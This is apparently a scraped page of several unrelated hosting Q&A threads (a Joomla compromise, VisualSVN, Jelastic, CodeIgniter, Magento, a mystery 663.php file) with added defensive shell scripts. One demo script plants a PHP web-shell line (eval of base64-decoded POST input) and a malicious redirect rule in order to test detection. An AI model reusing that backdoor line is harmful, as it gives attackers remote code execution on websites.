Joomla! 2.5.4 Hacked: Having trouble with diagnosis - joomla

My Joomla 2.5.4 site was cracked last night. Moreover, the Joomla forum is currently down, and I can't even run Joomla's diagnostic utility (fpa-en.php).
I have followed Joomla's instructions for diagnosis with no success (see below). I have also emailed my webhost (I am on a shared server, but I use a host recommended by Joomla that is a specialist in Joomla sites). So, my question is: what do I do next?
Here is the info that I have so far.
Using Joomla 2.5.4 (the latest). All extensions were updated to the most recent release, and none are on the Joomla vulnerable extensions list.
Passwords of other administrators were changed, but not mine, fortunately.
The user_notes table was deleted, which renders the User Manager in the admin section useless.
According to the logs, the attack hit the following files in this sequence:
/administrator/index.php
/index.php (Root)
/plugins/authentication/joomla/joomla.php
/plugins/user/joomla/joomla.php
and then the changes to the users and user_notes tables.
There is no junk in either index.php.
The attack IP was 199.15.234.216, which is from a Fort Worth server of supremetelecom.com.
Fortunately, I have backups and there was no defacement, but until I can get fpa-en.php to work and get access to the Joomla forums, I am not sure what to do other than change all passwords and block the IP.
Thanks in advance for any help!

Firstly, reset the passwords of all the administrators, including yours; then change them and ensure they include letters and numbers. Then change the password for the host control panel, using the password generator if they provide one; if not, use a password generator online. Once this is done, change the password for your database username, and don't forget to also update configuration.php with your new password.
Secondly, download and install Admin Tools, which will add more security to your site for the future. Admin Tools also comes with an Emergency Offline button, which is useful.
Then download and install Saxum IP Logger, which will trace all the registered users, giving you their IP address, country and so on; you can also block IP addresses using the plugin that comes with it.
Next, go to the host control panel and look at the logs to see which IP addresses have entered your website and which files they have accessed. The IP address that corresponds to the files edited you can then block using the plugin I mentioned before. Joomla 2.5 is very hard to hack, so it is rather likely you have an extension that is badly developed and allows SQL injection. Therefore you should always choose popular extensions to install on your website when they are database related.
Hope this helps you in the future. Regards
EDIT: You can also password-protect your folders in the FTP for additional security.
You may also find this extension quite useful
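The log review step in the reply above ("which IP addresses have entered your website and which files they have accessed") is the one that usually identifies the entry point. The script below is an added example, not code from the thread or from Joomla: it works on a standard Apache/nginx "combined" access log and answers two questions, what one IP did in order, and who touched a given file. The log lines are constructed for the demo (documentation IPs, paths taken from the poster's list); the names ip_timeline, ips_for_path and plugin_hits are the example's own.

```shell
#!/bin/sh
# Added example, not from the original thread: pull the request timeline of
# one source IP out of a combined-format access log, and find every IP that
# touched a given path. The log below is constructed for the demo; the paths
# mirror the ones the poster saw hit, the IPs are documentation addresses.
# Assumed format: Apache/nginx "combined" (host - user [time] "req" status ...).

SAMPLE_LOG="$(mktemp)"
cat > "$SAMPLE_LOG" <<'EOF'
203.0.113.5 - - [20/Apr/2012:02:11:03 +0000] "GET /administrator/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Apr/2012:02:11:04 +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Apr/2012:02:11:05 +0000] "GET /index.php HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Apr/2012:02:11:09 +0000] "GET /index.php HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Apr/2012:02:11:15 +0000] "POST /plugins/authentication/joomla/joomla.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Apr/2012:02:11:20 +0000] "POST /plugins/user/joomla/joomla.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
EOF

# ip_timeline IP LOG: every request from IP, in log order: "time method path status"
ip_timeline() {
  awk -v ip="$1" '$1 == ip {
    t = $4; sub(/^\[/, "", t)          # strip the leading "[" of the timestamp
    m = $6; sub(/^"/, "", m)           # strip the opening quote of the request line
    print t, m, $7, $9
  }' "$2"
}

# ips_for_path PATH LOG: which IPs requested PATH, hit count first, busiest first
ips_for_path() {
  awk -v p="$1" '$7 == p { n[$1]++ } END { for (h in n) print n[h], h }' "$2" | sort -rn
}

# plugin_hits LOG: direct requests to files under /plugins/. Joomla loads
# plugins through index.php; a browser never needs to request them by URL,
# so any such hit is worth a look regardless of who sent it.
plugin_hits() {
  awk '$7 ~ /^\/plugins\// { print $1, $7 }' "$1" | sort | uniq -c | sort -rn
}

echo "== timeline for 203.0.113.5 =="
ip_timeline 203.0.113.5 "$SAMPLE_LOG"
echo "== who requested the user plugin =="
ips_for_path /plugins/user/joomla/joomla.php "$SAMPLE_LOG"
echo "== direct plugin requests =="
plugin_hits "$SAMPLE_LOG"
```

On a real host, point the functions at the rotated logs as well (the attack in the question spanned a night, and logs rotate), and compare the timestamps of the first request to the plugin files against the mtime of those files: if the file changed after the request, the request is the write.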

After you recover from this, make sure you place a password on the /administrator directory with .htaccess, assuming this is a Linux-based server.

A couple of steps that will help you identify the point of access.
It also depends on whether you have access to some server-side tools.
Contact your host and ask them if they run mod_security; if so, ask them for the mod_security flag for that IP.
Ask the host if they run any type of maldet tools; if so, ask for a scan of your account.
If you have shell access, run a check on what the most recent file changes were, aside from tmp and cache files.
Fixing the hack
1. Change all your passwords.
2. Install Project Honey Pot.
3. Installing Admin Tools is good, but you need the Pro version to really gain access to the security tools.
4. Migrate to a host that specializes in Joomla platforms; in most cases they already have the accounts configured for common security issues in Joomla.
Getting hacked really sucks... Good luck!

Relocate your administrator page by editing the config.php files, and edit your FTP permission settings. If your administration login URL was at the standard location (www.site.com/administrator), change this location and block access using your hosting control panel to only certain IP addresses (and even restrict access by hours of availability).
How many administrator user accounts do you have? There really should be only one person with super user access. It is really not productive or safe to have other users that do minor edits of the website with administrator privileges; they could accidentally cause issues. These are basic steps and there is a lot more you can do. Send an email if you need help/step-by-step instructions. Hope all goes well.
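Two replies above recommend, respectively, a password on /administrator via .htaccess and restricting that URL to certain IP addresses. The script below is an added example (not from the thread, not Joomla's own htaccess.txt) that does both in one .htaccess for Apache 2.4: Basic auth and an address list, with both checks required. It assumes Apache 2.4 Require syntax, that AllowOverride permits AuthConfig and Limit for the directory, and that the password file is kept outside the web root; the path /etc/apache2/joomla-admin.htpasswd is a placeholder.

```shell
#!/bin/sh
# Added example, not from the original thread: generate an Apache 2.4
# .htaccess that puts HTTP Basic authentication on /administrator and also
# restricts it to a list of source addresses; both conditions must hold.
# Assumes Apache 2.4 (Require syntax), AllowOverride AuthConfig Limit for the
# directory, and a password file stored outside the web root (path is a placeholder).

# write_admin_htaccess DIR PASSFILE ADDR...   (ADDR = IP or CIDR, one or more)
write_admin_htaccess() {
  dir="$1"; passfile="$2"; shift 2
  {
    echo 'AuthType Basic'
    echo 'AuthName "Restricted administrator area"'
    echo "AuthUserFile $passfile"
    echo '<RequireAll>'
    echo '    Require valid-user'
    echo "    Require ip $*"     # all allowed addresses on one line: a client may match any of them
    echo '</RequireAll>'
  } > "$dir/.htaccess"
}

# add_htpasswd_user PASSFILE USER PASS: append a user with an APR1-MD5 hash,
# the format Apache expects in an htpasswd file. The password is fed on stdin
# so it never shows up in the process list.
add_htpasswd_user() {
  hash=$(printf '%s\n' "$3" | openssl passwd -apr1 -stdin)
  printf '%s:%s\n' "$2" "$hash" >> "$1"
}

# Demo: write into a temp directory instead of a live site.
DEMO="$(mktemp -d)"
write_admin_htaccess "$DEMO" /etc/apache2/joomla-admin.htpasswd 203.0.113.0/24 198.51.100.7
cat "$DEMO/.htaccess"
if command -v openssl >/dev/null 2>&1; then
  add_htpasswd_user "$DEMO/joomla-admin.htpasswd" admin 'correct horse battery staple'
  cat "$DEMO/joomla-admin.htpasswd"
fi
```

On Apache 2.2 the same policy is written with Order deny,allow / Deny from all / Allow from ... plus Satisfy all; the RequireAll block above is 2.4-only. Basic auth sends the password in the clear unless the admin URL is served over HTTPS, so pair this with TLS.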


No Users Or Groups Folders In VisualSVN Server

I have downloaded VisualSVN Server, version 5.1.1. In the left panel there is only Repositories and Jobs. I want to add new users for learning and testing purposes. However, I can't see any settings to do so. I currently don't have a licence. Is this the main reason? If not, how can I enable the Users and Groups folders, or how can I reach the related settings? Keep in mind that I'm a complete newbie to this application. Any help is appreciated, thanks.
I have tried to find related settings in the authentication properties but I got confused and bogged down. I have tried to open the application as Administrator, and still couldn't find or make sense of the settings.
I also tried to find the Subversion authentication settings, which are normally on the main page.
In the MMC snap-in, you should have a Users option down the left-hand side of the tree. However, on the main VisualSVN page, you have various options, one of which should be Subversion Authentication. You can also add users and groups using the options here (see below for a screenshot of my SVN Server). Regarding the license, that shouldn't be an issue, as long as your requirement fits within the "Community" licensing requirements.
If you don't see options to create Users / Groups, use Configure Authentication Options and set the Authentication Mode to Subversion Authentication. This will allow Subversion to authenticate users based on a list that is set up within the server itself. Hope that helps.
The Users and Groups folders are only available in the management console when your server is configured to use the standalone Subversion authentication mode. When this authentication mode is active, your server maintains a dedicated list of user and group accounts.
However, your screenshot shows that you've enabled Windows authentication. In this case, your server integrates with your Active Directory domain / Windows, and user and group accounts are maintained by Active Directory. I.e., you don't need to create users and groups in VisualSVN Server. They are already created in your domain and you can grant permissions to these accounts via the management console.
You can find more information about the authentication modes in the article KB182: VisualSVN Server authentication modes.

Jelastic: how to contribute to Certified App source code?

While setting up a basic 1 x NGINX load balancer in front of 2 backends, I ended up with what is clear to me to be a bug: the cron of this Certified App cannot be edited:
As you can see, in this particular app the cron file is owned by root:root and doesn't have the extended attribute (the plus to the right of the permissions) necessary for the file to be editable also by the logged-in user (nginx in this case).
All other certified apps instead allow the main login user to have crontabs, even though I found the permissions of each file vary a lot.
I've stumbled on https://github.com/jelastic/jem/blob/master/etc/jelastic/export.conf and it seems the file to go for proposing a bugfix, but its last update is Aug-2016, so I guess Jelastic has closed much of its source code.
How can we contribute to Certified App source code?
Indeed it is a bug, as the cron file of the nginx user isn't editable in a balancer template; by design it has to be.
As for exports.conf: this file is left for backwards compatibility, but is no longer used.
The problem will definitely be fixed in the latest templates; as for existing containers, we would like to apply a patch to fix them. If you provide us more details about the hosting service provider you are using, we will help with that.
As for contributing to certified templates, all the images are publicly available on Docker Hub. You can create your own version of a template based on an existing one: build a Docker image whose Dockerfile specifies
"FROM jelastic/nginxbalancer" as the base, then make any modifications to the filesystem. The next step is just to replace the existing balancer with your custom one.
Anyway, let's start with fix of existing containers.
Many thanks for finding out the bug!

Moving CodeIgniter from live to local

Perhaps someone can share their experience or advise on how to get this accomplished.
I have looked around and found only a wiki entry dealing with server migration from host to host.
Here is the setup and things I have tried:
locally I am running win 10 with XAMPP server
hosted on hostgator
Downloaded all files from live site
Did an SQL dump/import onto my local mySQL
Edited ‘exp_sites’ for paths and URLs
Edited ‘config.php’ in system folder
Result:
- cannot log in to the backend: the form refreshes but there is no redirect. I can tell that the db is being queried since I do get an error back if it is a wrong password.
Has anyone done similar setups/downloads/take-overs of their client's site?
Ideally, I would just like the access to CP so I can edit the settings/paths of weblogs,uploads etc.
Thanks for your time!
Are you using the CI default password library for password creation? If you are, then these passwords will not work for you, because this library generates server-dependent passwords.

Magento Connect Manager - Error #619 security: script is world-writable

I have a curious issue. When I start the Connect Manager I see a white window with the following error message: svwrap $Revision: 1.36 $
Error #619 security: script is world-writable
Does anyone have an idea what could be? I know what "world-writable" means but what file it might be? Thanks for an answer. Hermann
I'd contact your hosting company about this. This message isn't generated by Magento; it's generated by a program your web hosting company has installed to scan for world-writable scripts.
Also, you may want to consider a different web-host if you need to use Magento Connect's web UI. This feature requires the Magento web server user have write access to the Magento installation to download and update files. It sounds like your hosting company may not be down with that.
All that said, my guess is it's, at minimum, the downloader/index.php file.
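An added example, not from the thread or from Magento, of finding what such a scanner flags: files or directories with the other-write bit set under a web root. It also shows the narrowest fix, dropping only that bit, so the web server user (or its group) keeps whatever write access Magento's var/ and media/ already had, which is what Magento Connect needs. The tree is constructed in a temp directory; the function names are the example's own.

```shell
#!/bin/sh
# Added example, not from the original thread: find what a "world-writable"
# scanner would flag under a web root (files or directories with the
# other-write bit set) and strip that bit without touching owner/group
# permissions. The tree is constructed in a temp directory for the demo.

# make_demo_tree DIR: a small Magento-like tree with two deliberate mistakes
make_demo_tree() {
  mkdir -p "$1/downloader" "$1/media" "$1/var"
  printf '<?php\n' > "$1/index.php";            chmod 0644 "$1/index.php"
  printf '<?php\n' > "$1/downloader/index.php"; chmod 0666 "$1/downloader/index.php"  # flagged
  chmod 0777 "$1/media"     # flagged
  chmod 0775 "$1/var"       # group-writable only: the web server group can write, nobody else
}

# world_writable DIR: files and directories anyone on the box can write to
world_writable() {
  find "$1" -perm -002 \( -type f -o -type d \) -print | sort
}

# fix_world_writable DIR: remove only the other-write bit. Owner and group
# bits are untouched, so directories the web server user must write to keep working.
fix_world_writable() {
  find "$1" -perm -002 \( -type f -o -type d \) -exec chmod o-w {} +
}

ROOT="$(mktemp -d)"
make_demo_tree "$ROOT"
echo "== before =="; world_writable "$ROOT"
fix_world_writable "$ROOT"
echo "== after (should be empty) =="; world_writable "$ROOT"
```

On a shared host where PHP runs as your own account (suPHP, FastCGI), the files can be 0644/0755 and still be writable by Magento; 0666/0777 is only "needed" when PHP runs as a different user than the file owner, and then the right answer is group write, not world write.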

unknown file 663.php in ftp root

For some reason I have a 663.php file in every folder and subfolder of my httpdoc root on my web server FTP. I don't know where this file came from, and my host does not know either.
I would very much appreciate any help.
Depending on its content, it could be a PHP shell backdoor.
An attacker would upload this file to gain access to your files, database, etc.
They usually exploit a flaw in your application to upload files.
Be sure to update all the software you are running.
Someone might have gained access to your site; also change all passwords.
It looks like this has occurred before to other users:
"Your site has been hacked. The 663.php file is sending out anonymous spam. If you host with GoDaddy, this is a common theme as thousands of accounts share one IP and one person with shell access can get in and place an htaccess file above the root folder on the server and autoload the files into every folder in your website and onto every site within that IP address." (Year1Media)
Quote from AolAnswers.
Thank you all for your help. After a little search I found out that it was a Plesk security vulnerability. The problem was solved by running a patch in Parallels Plesk. Apart from inserting unknown files, it also changed .htaccess to redirect to weird websites.
It is a Plesk problem.
There are correction patches here:
http://kb.parallels.com/en/113321
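The poster reports two artefacts: the same file dropped into every directory, and .htaccess files rewritten to redirect elsewhere. The script below is an added example, not from the thread or from Plesk, of how to inventory both before cleaning up: it enumerates every copy of the dropped name, checks whether they are a single payload (one checksum) or several, and lists each .htaccess whose Redirect/RewriteRule points at an absolute URL. The tree, file contents and hostname bad.example are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original thread: when the same file name has been
# dropped into every directory, enumerate the copies, confirm they are one
# payload (one checksum), and find every .htaccess whose rewrite/redirect
# rules send visitors off-site. Tree constructed in a temp directory for the demo.

ROOT="$(mktemp -d)"
mkdir -p "$ROOT/images/stories" "$ROOT/media"
for d in "$ROOT" "$ROOT/images" "$ROOT/images/stories" "$ROOT/media"; do
  printf '<?php eval(base64_decode($_POST["x"])); ?>\n' > "$d/663.php"
done
# a tampered root .htaccess: visitors arriving from a search engine get bounced to another host
printf 'RewriteEngine On\nRewriteCond %%{HTTP_REFERER} google\nRewriteRule .* http://bad.example/go [R,L]\n' > "$ROOT/.htaccess"
printf 'Options -Indexes\n' > "$ROOT/images/.htaccess"   # a benign one, must not be reported

# dropped_copies ROOT NAME: "crc size path" for every copy of NAME, sorted by path
dropped_copies() {
  find "$1" -type f -name "$2" -exec cksum {} \; | sort -k3
}

# distinct_payloads ROOT NAME: how many different contents hide behind NAME
distinct_payloads() {
  dropped_copies "$1" "$2" | awk '{ print $1 }' | sort -u | wc -l | tr -d ' '
}

# offsite_redirects ROOT: .htaccess files with a Redirect/RewriteRule to an absolute URL
offsite_redirects() {
  find "$1" -type f -name .htaccess \
    -exec grep -lE '^[[:space:]]*(RewriteRule|Redirect(Match|Permanent|Temp)?)[[:space:]].*https?://' {} \; | sort
}

echo "== copies of 663.php =="
dropped_copies "$ROOT" 663.php
echo "== distinct payloads: $(distinct_payloads "$ROOT" 663.php)"
echo "== .htaccess files redirecting off-site =="
offsite_redirects "$ROOT"
```

If distinct_payloads reports more than one, keep a copy of each variant before deleting anything; they are the evidence of what was run on the account. Deleting the copies (find ROOT -name 663.php -delete) removes the shell but not the .htaccess changes or whatever dropped them, which is why restoring from a known-good backup after applying the vendor patch is the cleaner path.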
